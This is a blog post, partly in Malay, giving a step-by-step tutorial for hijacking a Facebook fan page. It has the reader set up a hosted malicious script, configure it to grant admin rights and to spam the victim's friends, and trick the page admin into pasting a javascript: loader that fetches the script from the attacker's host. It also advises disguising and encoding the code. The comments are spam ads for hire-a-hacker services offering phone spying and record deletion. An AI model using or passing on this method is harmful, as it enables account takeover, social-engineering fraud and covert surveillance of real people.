Tuesday 11 June 2013

Hack Facebook Fan Page



Assalamualaikum . hari ni saya nak ajar cara-cara untuk mengodam Facebook Fan page

AMARAN!

ILMU DIKONGSI GUNALAH SEBAIK-BAIKNYA . 

Now lets start the tutorial of facebook fan page hacking . First of all we will need to setup an exploit and a website to host that exploit. If you already have a registed hosting account then its great otherwise there are couple of free hosting websites that can be used for such purposes like 000webhost.com etc.

Step 1: First download Facebook page hacking exploit,

CLICK ME TO DOWNLOAD  Facebook page hacking exploit


Step 2: Now open the pagehack.js [in package] with notepad and search for nk@wildhacker.com and change nk@wildhacker.com with ur facebook email.

Step 3: Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text <b>Hey See what i got!</b> and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15. 

Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js) and then save it.

Step 4: Now create a account on free hosting like 0fess.net or 000webhost.com ( 110mb won t help this time)and upload facebook page hacking exploit on your free hosting website. you will get url address something like this 

www.yoursite.com/pagehack.js

Step 5: Now ask victim to paste this in browser address bar, He must be admin of page.Which you wants to hack:

javascript:(a = (b = document).createElement("script")).src = "http://www.yourwbesite.com/pagehack.js", b.body.appendChild(a); void(0)

Note : Change scr = http://www.yourwbesite.com/pagehack.js in javascript with ur own address.

Encode this javascript into ascii format for more results.

Tip: Tell him that it will make your page safe, or something else like attracting. 

 When he will put this key in address bar and that's it you will get a notification that you are admin of his page now. 

 Enjoy, But don't hack for bad cause, I will not be responsible for any consequences made by you.

5 Komen:

  1. Please! Tolong sy hack, sy sdg alama masalah yg rumit..sekiranya sudi sila email sy d firafiona@gmail.com.

    ReplyDelete
  2. i would like you to hack a page.. Kindly pm me if u interested.. payment is ready for u.. tengku_dieymust95@yahoo.com

    ReplyDelete
  3. cryptocyberhacker@gmail.com will give u complete access to your target phone without any trace . I hired them to have my spouse phone last Week and it was done in less than 5hrs Now I have access to her text, chats,call conversations , gps, and also her deleted text messages etc all they was made possible by the spyware supreme built for me so feel free to contact the email ….you never going to regret working with him….you surely thank me later

    ReplyDelete
  4. cryptocyberhacker@gmail.com have be so helpful.. I never believed in hacking like having access to someones phone without installing anything on it or having physical contact but after I hired this team they made it possible for me in less than 10hrs..this really exposed my cheating husbands and I’m so grateful that I find out earlier.. Thanks to cryptocyberhacker@gmail.com and I’m also recommending them to anyone who need help related to hacking .:

    ReplyDelete
  5. Some years ago I had a few misdemeanors and was wrongly convicted for prostitution when I was just turning 22, and bad friends got me into this situation. It makes it hard for me to get a job when employers background check me, at the same time i had a big issue with a bad guy that threatened to blackmail me. I was so so depressed with no hope at all until i found this hacker on Google after seeing different wonderful reviews about his services. He helped me clear criminal records, track down the fool that has been hacking into my personal stuff and stealing my bitcoin, also deleted some negative news about me online within 48 hours. I have actually found a special kind & reliable hacker so I am going to tell everybody about this for safety reasons. This is where you can reach him for any hacking related issue. [wisetechhacker@gmail.com or whatsapp:+1{917}5085328] 

    ReplyDelete